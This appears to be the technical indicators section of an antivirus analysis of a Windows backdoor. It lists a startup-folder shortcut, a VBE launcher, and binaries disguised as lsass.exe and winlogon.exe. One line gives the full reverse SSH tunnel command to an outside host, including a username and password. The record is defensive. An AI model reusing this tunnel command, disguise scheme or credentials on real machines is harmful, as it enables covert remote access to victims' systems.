Техническая информация
- %HOMEPATH%\Start Menu\Programs\Startup\ReaderUpdate.lnk
- 'C:\PefrLogs\lsass.exe' -ssh -R 46481:127.0.0.1:8293 -N suleyman.soxx.us -l suleyman -pw coaiepezacusca
- 'C:\PefrLogs\winlogon.exe' -d -t -l -e0.0.0.0 -i127.0.0.1 -p8293 -a
- '<SYSTEM32>\wscript.exe' "C:\PefrLogs\GoogleIndexer.vbe"
- C:\PefrLogs\GoogleIndexer.vbe
- <LS_APPDATA>\PUTTY.RND
- C:\PefrLogs\lsass.exe
- C:\PefrLogs\ReaderUpdate.lnk
- C:\PefrLogs\winlogon.exe
- 'su####an.soxx.us':22
- DNS ASK su####an.soxx.us
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''